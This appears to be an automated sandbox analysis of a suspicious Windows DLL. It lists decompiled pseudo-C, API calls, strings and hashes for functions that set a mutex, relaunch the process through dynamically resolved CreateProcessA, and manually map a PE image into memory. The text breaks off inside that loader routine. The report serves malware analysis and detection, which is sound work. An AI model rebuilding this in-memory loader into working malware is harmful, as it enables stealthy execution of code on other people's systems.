Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProcProcess$CreateExitHandleModule
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 3220508843-1906453927
Opcode ID: 332e5bfa4e15e63fa7738ea2df6f749f3a0894d7f185e108d4049841d8b87df8
Instruction ID: daeb7d9119097033d96b27e81e512ba040f5f65a0429bcf9062e6a272523041b
Opcode Fuzzy Hash: 332e5bfa4e15e63fa7738ea2df6f749f3a0894d7f185e108d4049841d8b87df8
Instruction Fuzzy Hash: E5217AB1D04308EAEF10EFE0CD45BEEBBB9BF44B04F108448E240BA284D7B05644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F321167, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6F321167() {
				intOrPtr* _t25;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t31;
				void* _t43;
				void* _t44;
				void* _t48;

				if(_t48 != 0) {
					 *((intOrPtr*)(_t43 - 0x23)) = 0x616d6d6f;
					 *((intOrPtr*)(_t43 - 0x1f)) = 0x694c646e;
					 *((short*)(_t43 - 0x1b)) = 0x656e;
					 *((char*)(_t43 - 0x19)) = 0x41;
					 *((char*)(_t43 - 0x18)) = 0;
					 *((intOrPtr*)(_t43 - 0x17)) = 0x61657243;
					 *((intOrPtr*)(_t43 - 0x13)) = 0x72506574;
					 *((intOrPtr*)(_t43 - 0xf)) = 0x7365636f;
					 *((short*)(_t43 - 0xb)) = 0x4173;
					 *((char*)(_t43 - 9)) = 0;
					 *(_t43 - 8) = 0;
					 *(_t43 - 4) = 0;
				}
				_t44 = _t43 + 1;
				asm("cld");
				 *_t25 =  *_t25 + _t25;
				 *_t25 =  *_t25 + _t25;
				E6F33C640(_t25);
				E6F321426(_t44 - 0x84, 0, 0x44);
				E6F321426(_t44 - 0x40, 0, 0x10);
				_t15 = _t44 - 0x30; // 0x6e72656b
				_t29 = GetModuleHandleA(_t15);
				_t16 = _t44 - 0x27; // 0x43746547
				 *((intOrPtr*)(_t44 - 8)) = GetProcAddress(_t29, _t16);
				_t31 = _t29;
				_t18 = _t44 - 0x17; // 0x61657243
				 *((intOrPtr*)(_t44 - 4)) = GetProcAddress(_t31, _t18);
				if(CreateProcessA(0,  *((intOrPtr*)(_t44 - 8))(), 0, 0, 1, 0, 0, 0, _t44 - 0x84, _t44 - 0x40) != 0) {
					 *0x6f366060 =  *(_t44 - 0x40);
					E6F33C650();
				}
				E6F33C630();
				L6:
				goto L6;
			}

0x6f3211c3
0x6f3211c6
0x6f3211cd
0x6f3211d4
0x6f3211da
0x6f3211de
0x6f3211e2
0x6f3211e9
0x6f3211f0
0x6f3211f7
0x6f3211fd
0x6f321201
0x6f321208
0x6f321208
0x6f321209
0x6f32120a
0x6f32120b
0x6f32120d
0x6f32120f
0x6f32121f
0x6f32122f
0x6f321237
0x6f32123b
0x6f321242
0x6f32124d
0x6f321250
0x6f321251
0x6f32125c
0x6f321281
0x6f321286
0x6f32128b
0x6f32128b
0x6f321290
0x6f321295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F32123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F321247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F321256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F32127C

Strings

sA, xrefs: 6F3211F7
kernel32, xrefs: 6F321237, 6F32123A
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleModuleProcess
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1919063930-1906453927
Opcode ID: 0e1123ccac51313b1da447c020553779f25974830ac46677bb32401ef8926714
Instruction ID: 7c5433b20faf0ec8ca4b099c31d2c7690c221a8f38fe46dda86d5c404f08fff9
Opcode Fuzzy Hash: 0e1123ccac51313b1da447c020553779f25974830ac46677bb32401ef8926714
Instruction Fuzzy Hash: 82219AB1D04348EAEF10EFE0CD05BEEBBB9AF40B00F108449E240BA1C0D7B15644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F321000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321000() {
				long _t2;
				intOrPtr* _t4;

				CreateMutexA(0, 1, "7ce3e80173264ea19b05306b865eadf9"); // executed
				_t2 = GetLastError();
				 *_t4 =  *_t4 + _t2;
				return _t2;
			}

0x6f32100b
0x6f321011
0x6f321017
0x6f32101a

APIs

CreateMutexA.KERNELBASE(00000000,00000001,7ce3e80173264ea19b05306b865eadf9,6F321029,6F3210E6,6F339D3B,00000001,00000000), ref: 6F32100B
GetLastError.KERNEL32 ref: 6F321011

Strings

@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F321011

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9
API String ID: 1925916568-2035636723
Opcode ID: aaad836b8cc22b8836ae5a60480b51050951a8181b995f518962d26f9405bbbd
Instruction ID: 5239fefcc64cace85d83dc8fe7b42495a62c8a8ad1df4698b8c3e4ef46e40a0b
Opcode Fuzzy Hash: aaad836b8cc22b8836ae5a60480b51050951a8181b995f518962d26f9405bbbd
Instruction Fuzzy Hash: DCC04CB014CA00ABDF405B60D84DB343A79AB83762F00452CB2418C084D6A204608B61

Uniqueness

Uniqueness Score: -1.00%

Function 6F34288D, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F34288D(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t18 = __ecx;
				_push(__ecx);
				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F342856(_t26) - _t26 >> 1;
					_t7 = E6F3427A9(0, 0, _t26, E6F342856(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F33FEB1(_t18, _t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F3427A9(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F33FEFF(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6f34288d
0x6f342892
0x6f34289c
0x6f3428a2
0x6f3428fd
0x6f3428fd
0x6f3428a4
0x6f3428b2
0x6f3428b8
0x6f3428c0
0x6f3428c5
0x00000000
0x6f3428c7
0x6f3428c8
0x6f3428cd
0x6f3428d2
0x6f3428f2
0x6f3428ec
0x6f3428ec
0x6f3428ee
0x6f3428ee
0x6f3428f5
0x6f3428fa
0x6f3428c5
0x6f342901
0x6f342904
0x6f342904
0x6f342912

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F342896
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F342904

Part of subcall function 6F3427A9: WideCharToMultiByte.KERNEL32(?,00000000,6F34084A,00000000,00000001,6F3407E3,6F343ABD,?,6F34084A,?,00000000,?,6F343834,0000FDE9,00000000,?), ref: 6F34284B

Part of subcall function 6F33FEB1: RtlAllocateHeap.NTDLL(00000000,6F37E844,6F37E824,?,6F33C421,00000000,6F37E844,00000000), ref: 6F33FEE3

_free.LIBCMT ref: 6F3428F5

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: c65346c08fd7c5ccf90ee9f61bbf12134179963f304206dddaba77e87ed1b293
Instruction ID: fecc4264358a28a132710811a26812051b9203021867339da49bfc131ee75c77
Opcode Fuzzy Hash: c65346c08fd7c5ccf90ee9f61bbf12134179963f304206dddaba77e87ed1b293
Instruction Fuzzy Hash: E601A773E057657B672155BA0E88CBF2AEDDEC7AB43120229FE14E2245EF62CC1191F4

Uniqueness

Uniqueness Score: -1.00%

Function 6F3401B7, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6F3401B7(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f37e7c8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F342E3C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F3401A4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6F342A43(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6f3401b7
0x6f3401bd
0x6f3401c2
0x6f3401d0
0x6f3401d0
0x6f3401d6
0x6f3401d8
0x6f3401d8
0x6f3401ef
0x6f3401f8
0x6f340200
0x00000000
0x00000000
0x6f3401e0
0x6f3401e2
0x6f340204
0x6f340209
0x6f34020f
0x00000000
0x6f34020f
0x6f3401e5
0x6f3401ea
0x6f3401eb
0x6f3401ed
0x00000000
0x00000000
0x6f3401ed
0x00000000
0x6f3401ef
0x6f3401c8
0x6f3401ce
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6F3411DC,00000001,00000364,00000006,000000FF,?,6F33C421,00000000,6F37E844,00000000), ref: 6F3401F8

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4dda0b2343b0a6ecb35d1bd7ca127bcedb2d964320ceba13734b20b6522d1108
Instruction ID: 28cb2c5900f9084211105f27fb9d5ab4116849ced50d5f2a0d0b2780c17b8dda
Opcode Fuzzy Hash: 4dda0b2343b0a6ecb35d1bd7ca127bcedb2d964320ceba13734b20b6522d1108
Instruction Fuzzy Hash: 0EF0B4B5744B2466EB115A26CD00F8F3BCCAFA2770B00A116AC24FA1C0CB31F5008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33FEB1, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F33FEB1(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F3401A4(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f37e7c8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F342E3C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6F342A43(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6f33feb1
0x6f33feb7
0x6f33febd
0x6f33feef
0x6f33fef4
0x6f33fefa
0x00000000
0x6f33fefa
0x6f33fec1
0x6f33fec3
0x6f33fec3
0x6f33feda
0x6f33fee3
0x6f33feeb
0x00000000
0x00000000
0x6f33fecb
0x6f33fecd
0x00000000
0x00000000
0x6f33fed0
0x6f33fed5
0x6f33fed6
0x6f33fed8
0x00000000
0x00000000
0x6f33fed8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6F37E844,6F37E824,?,6F33C421,00000000,6F37E844,00000000), ref: 6F33FEE3

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a028a5cac9db95b790e5116d3e4594e9c87ffc44b6435b9b66b53007d1537e4f
Instruction ID: 44acedf11ad891d511b2cf7769b888398b499b563befddfe533ce8b7a3702605
Opcode Fuzzy Hash: a028a5cac9db95b790e5116d3e4594e9c87ffc44b6435b9b66b53007d1537e4f
Instruction Fuzzy Hash: 5CE0A0329003F057AB14D6799D00B8B7A8C9FD27A4B510111EC54A66D2DB21E94086A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33C650, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33C650() {

				E6F321299();
				ExitProcess(0);
			}

0x6f33c650
0x6f33c657

APIs

Part of subcall function 6F321299: WaitForSingleObject.KERNEL32(000000FF,6F33C655,6F321290,?,CreateProcessA), ref: 6F3212A1

ExitProcess.KERNEL32 ref: 6F33C657

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitObjectProcessSingleWait
String ID:
API String ID: 3568891979-0
Opcode ID: 8a6ee0063076baf3cb6616fc04f820e8fe7cf68711903669f9e51215f60b97f8
Instruction ID: 83252a0eeada84ba37d10b9e6a50a9921435cb665ede30f215fe1a244a3f33ac
Opcode Fuzzy Hash: 8a6ee0063076baf3cb6616fc04f820e8fe7cf68711903669f9e51215f60b97f8
Instruction Fuzzy Hash: 4790027415870066D9603A64450971826585701636F100004B14DA80C04F62015865D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F33BB30, Relevance: 14.0, APIs: 9, Instructions: 493
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6F33BB30(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				long _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				long _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _t198;
				void* _t209;
				long _t212;
				intOrPtr _t221;
				void _t235;
				void* _t237;
				signed int _t239;
				long _t240;
				signed int _t242;
				intOrPtr _t245;
				long _t248;
				intOrPtr* _t253;
				signed int* _t255;
				signed int* _t258;
				signed int _t264;
				signed int _t265;
				signed char _t266;
				intOrPtr _t267;
				signed int _t270;
				void* _t279;
				void* _t288;
				void* _t293;
				intOrPtr _t294;
				signed int _t297;
				void _t298;
				intOrPtr _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				long _t306;
				signed char _t307;
				signed int _t308;
				intOrPtr _t312;
				void _t314;
				signed int _t318;
				signed int _t319;
				void _t321;
				intOrPtr _t329;
				intOrPtr _t333;
				void* _t336;
				signed int* _t339;
				void* _t341;
				signed int _t343;
				intOrPtr _t345;
				intOrPtr _t346;
				void _t348;
				signed int _t353;
				signed short* _t354;
				void* _t355;
				signed int _t358;
				long _t361;
				void* _t362;
				intOrPtr _t367;
				intOrPtr _t368;
				long _t369;
				long _t371;
				signed int _t375;
				void* _t376;
				long _t379;
				intOrPtr _t380;
				intOrPtr* _t384;
				signed int _t388;
				void* _t390;
				intOrPtr _t392;
				long _t394;
				intOrPtr _t395;
				signed int _t396;
				void* _t397;
				void* _t398;

				_t198 =  *0x6f36609c; // 0xe80c9ffe
				_v8 = _t198 ^ _t396;
				_t339 = __ecx;
				_push(__esi);
				_t371 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				_push(__edi);
				if(__edx < 0x40) {
					L3:
					_push(0xd);
					goto L88;
				} else {
					if( *__ecx != 0x5a4d) {
						L87:
						_push(0xc1);
						goto L88;
					} else {
						_t4 = _t339 + 0x3c; // 0xcccccccc
						_t306 =  *_t4;
						_v72 = _t306;
						_t6 = _t306 + 0xf8; // 0xcccccdc4
						if(__edx >= _t6) {
							_t297 = _t306 + __ecx;
							_v68 = _t297;
							if( *(_t306 + __ecx) != 0x4550 ||  *((intOrPtr*)(_t297 + 4)) != 0x14c) {
								goto L87;
							} else {
								_t307 =  *(_t297 + 0x38);
								if((_t307 & 0x00000001) != 0) {
									goto L87;
								} else {
									_t358 =  *(_t297 + 6) & 0x0000ffff;
									_t341 = ( *(_t297 + 0x14) & 0x0000ffff) + 0x24;
									if(_t358 != 0) {
										_t355 = _t341 + _t297;
										do {
											_t294 =  *((intOrPtr*)(_t355 + 4));
											_t355 = _t355 + 0x28;
											_t335 =  !=  ? _t294 : _t307;
											_t336 = ( !=  ? _t294 : _t307) +  *((intOrPtr*)(_t355 - 0x28));
											_t337 =  <=  ? _t371 : _t336;
											_t371 =  <=  ? _t371 : _t336;
											_t307 =  *(_t297 + 0x38);
											_t358 = _t358 - 1;
										} while (_t358 != 0);
									}
									__imp__GetNativeSystemInfo( &_v44);
									_t308 = _v40;
									_t343 =  !(_t308 - 1);
									_t361 = _t308 - 0x00000001 +  *((intOrPtr*)(_t297 + 0x50)) & _t343;
									if(_t361 != (_t308 - 0x00000001 + _t371 & _t343)) {
										goto L87;
									} else {
										_t209 = VirtualAlloc( *(_t297 + 0x34), _t361, 0x3000, 4);
										_v60 = _t209;
										if(_t209 != 0) {
											L13:
											_v100 = GetProcessHeap;
											_t212 = HeapAlloc(GetProcessHeap(), 8, 0x44);
											_t362 = _t212;
											_v76 = _t362;
											if(_t362 != 0) {
												 *((intOrPtr*)(_t362 + 4)) = _v60;
												 *((intOrPtr*)(_t362 + 0x1c)) = E6F33BA90;
												 *(_t362 + 0x14) = ( *(_t297 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t362 + 0x20)) = E6F33BAB0;
												 *((intOrPtr*)(_t362 + 0x24)) = E6F33BAD0;
												 *((intOrPtr*)(_t362 + 0x28)) = E6F33BAE0;
												 *((intOrPtr*)(_t362 + 0x2c)) = E6F33BB00;
												 *(_t362 + 0x34) = 0;
												 *(_t362 + 0x40) = _v40;
												if(E6F33B840(_v56,  *(_t297 + 0x54)) == 0) {
													L33:
													E6F33E93F( *((intOrPtr*)(_t362 + 0x30)));
													_t220 =  *((intOrPtr*)(_t362 + 8));
													_t398 = _t397 + 4;
													if( *((intOrPtr*)(_t362 + 8)) != 0) {
														_t375 = 0;
														if( *((intOrPtr*)(_t362 + 0xc)) > 0) {
															do {
																_t220 =  *((intOrPtr*)(_t362 + 8));
																_t312 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 8)) + _t375 * 4));
																if(_t312 != 0) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x2c))))(_t312,  *(_t362 + 0x34));
																	_t220 =  *((intOrPtr*)(_t362 + 8));
																	_t398 = _t398 + 8;
																}
																_t375 = _t375 + 1;
															} while (_t375 <  *((intOrPtr*)(_t362 + 0xc)));
														}
														E6F33E93F(_t220);
														_t398 = _t398 + 4;
													}
													_t221 =  *((intOrPtr*)(_t362 + 4));
													if(_t221 != 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x20))))(_t221, 0, 0x8000,  *(_t362 + 0x34));
													}
													HeapFree(_v100(), 0, _t362);
													return E6F33C65E(_v8 ^ _t396);
												} else {
													_t376 = VirtualAlloc(_v60,  *(_t297 + 0x54), 0x1000, 4);
													E6F33DD40(_t376, _v48,  *(_t297 + 0x54));
													_t397 = _t397 + 0xc;
													_v64 = 0;
													_t235 = _v48[0xf] + _t376;
													 *_t362 = _t235;
													 *((intOrPtr*)(_t235 + 0x34)) = _v60;
													_t314 =  *_t362;
													_t345 =  *((intOrPtr*)(_t362 + 4));
													_v52 = _t345;
													_t237 = ( *(_t314 + 0x14) & 0x0000ffff) + 0x24;
													if(0 >=  *(_t314 + 6)) {
														L29:
														_t239 =  *((intOrPtr*)(_t314 + 0x34)) -  *(_t297 + 0x34);
														_v68 = _t239;
														if(_t239 == 0) {
															L51:
															_t240 = 1;
														} else {
															if( *((intOrPtr*)(_t314 + 0xa4)) != 0) {
																_t353 =  *((intOrPtr*)(_t362 + 4));
																_t301 =  *((intOrPtr*)(_t314 + 0xa0)) + _t353;
																_v56 = _t353;
																_t267 =  *_t301;
																if(_t267 != 0) {
																	do {
																		_t329 =  *((intOrPtr*)(_t301 + 4));
																		_v72 = _t267 + _t353;
																		_t354 = _t301 + 8;
																		_t390 = 0;
																		if((_t329 - 0x00000008 & 0xfffffffe) > 0) {
																			_t369 = _v72;
																			do {
																				_t270 =  *_t354 & 0x0000ffff;
																				if((_t270 & 0x0000f000) == 0x3000) {
																					 *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) =  *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) + _v68;
																				}
																				_t329 =  *((intOrPtr*)(_t301 + 4));
																				_t390 = _t390 + 1;
																				_t354 =  &(_t354[1]);
																			} while (_t390 < _t329 - 8 >> 1);
																		}
																		_t267 =  *((intOrPtr*)(_t301 + _t329));
																		_t301 = _t301 + _t329;
																		_t353 = _v56;
																	} while (_t267 != 0);
																	_t362 = _v76;
																}
																goto L51;
															} else {
																_t240 = 0;
															}
														}
														 *(_t362 + 0x18) = _t240;
														if(E6F33B920(_t362) == 0) {
															goto L33;
														} else {
															_t298 =  *_t362;
															_t379 = ( *(_t298 + 0x14) & 0x0000ffff) + _t298;
															_t242 =  *(_t379 + 0x20);
															_t318 =  ~( *(_t362 + 0x40)) & _t242;
															_t346 =  *((intOrPtr*)(_t379 + 0x28));
															_v64 = _t242;
															_v96 = _t242;
															_v68 = _t318;
															_v92 = _t318;
															if(_t346 == 0) {
																_t266 =  *(_t379 + 0x3c);
																if((_t266 & 0x00000040) == 0) {
																	if(_t266 < 0) {
																		_t346 =  *((intOrPtr*)(_t298 + 0x24));
																	}
																} else {
																	_t346 =  *((intOrPtr*)(_t298 + 0x20));
																}
															}
															_t319 =  *(_t379 + 0x3c);
															_v88 = _t346;
															_v84 = _t319;
															_v80 = 0;
															_v72 = 1;
															if(1 >=  *(_t298 + 6)) {
																L75:
																_v80 = 1;
																if(E6F33B860(_t298, _t362,  &_v96, _t362, _t379) == 0) {
																	goto L33;
																} else {
																	_t348 =  *_t362;
																	_t321 = _t348;
																	_t380 =  *((intOrPtr*)(_t348 + 0xc0));
																	if(_t380 != 0) {
																		_t299 =  *((intOrPtr*)(_t362 + 4));
																		_t384 =  *((intOrPtr*)(_t380 + _t299 + 0xc));
																		if(_t384 != 0) {
																			_t253 =  *_t384;
																			if(_t253 != 0) {
																				do {
																					 *_t253(_t299, 1, 0);
																					_t253 =  *((intOrPtr*)(_t384 + 4));
																					_t384 = _t384 + 4;
																				} while (_t253 != 0);
																				_t321 =  *_t362;
																			}
																		}
																	}
																	_t245 =  *((intOrPtr*)(_t321 + 0x28));
																	if(_t245 == 0) {
																		 *(_t362 + 0x38) = 0;
																		return E6F33C65E(_v8 ^ _t396);
																	} else {
																		_t248 = _t245 + _v60;
																		if( *(_t362 + 0x14) == 0) {
																			 *(_t362 + 0x38) = _t248;
																			return E6F33C65E(_v8 ^ _t396);
																		} else {
																			 *(_t362 + 0x3c) = _t248;
																			 *(_t362 + 0x10) = 1;
																			return E6F33C65E(_v8 ^ _t396);
																		}
																	}
																}
															} else {
																_t255 = _t379 + 0x64;
																_v48 = _t255;
																do {
																	_v56 =  *((intOrPtr*)(_t255 - 0x1c));
																	_t367 =  *((intOrPtr*)(_t255 - 0x14));
																	_t388 =  ~( *(_t362 + 0x40)) & _v56;
																	_v52 = _t367;
																	_t362 = _v76;
																	if(_t367 == 0) {
																		if(( *_t255 & 0x00000040) == 0) {
																			if(( *_t255 & 0x00000080) != 0) {
																				_t368 =  *((intOrPtr*)(_t298 + 0x24));
																				goto L65;
																			}
																		} else {
																			_t368 =  *((intOrPtr*)(_t298 + 0x20));
																			L65:
																			_v52 = _t368;
																			_t362 = _v76;
																		}
																	}
																	if(_v68 == _t388) {
																		L71:
																		_t319 = _t319 |  *_t255;
																		asm("bt eax, 0x19");
																		if(_t319 >= 0) {
																			_t319 = _t319 & 0xfdffffff;
																		}
																		_t346 = _v52 - _v64 + _v56;
																		_t258 = _v48;
																		goto L74;
																	} else {
																		if(_v64 + _t346 > _t388) {
																			_t255 = _v48;
																			goto L71;
																		} else {
																			if(E6F33B860(_t298, _t362,  &_v96, _t362, _t388) == 0) {
																				goto L33;
																			} else {
																				_t264 = _v56;
																				_t346 = _v52;
																				_t298 =  *_t362;
																				_v64 = _t264;
																				_v96 = _t264;
																				_t265 = _t388;
																				_v68 = _t265;
																				_v92 = _t265;
																				_t258 = _v48;
																				_t319 =  *_t258;
																				goto L74;
																			}
																		}
																	}
																	goto L89;
																	L74:
																	_v48 =  &(_t258[0xa]);
																	_t379 = _v72 + 1;
																	_v84 = _t319;
																	_t255 = _v48;
																	_v88 = _t346;
																	_v72 = _t379;
																} while (_t379 < ( *(_t298 + 6) & 0x0000ffff));
																goto L75;
															}
														}
													} else {
														_t302 = _t237 + _t314;
														do {
															_t333 =  *((intOrPtr*)(_t302 + 4));
															if(_t333 != 0) {
																if(_v56 <  *((intOrPtr*)(_t302 + 8)) + _t333) {
																	SetLastError(0xd);
																	goto L33;
																} else {
																	_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t333, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t279 == 0) {
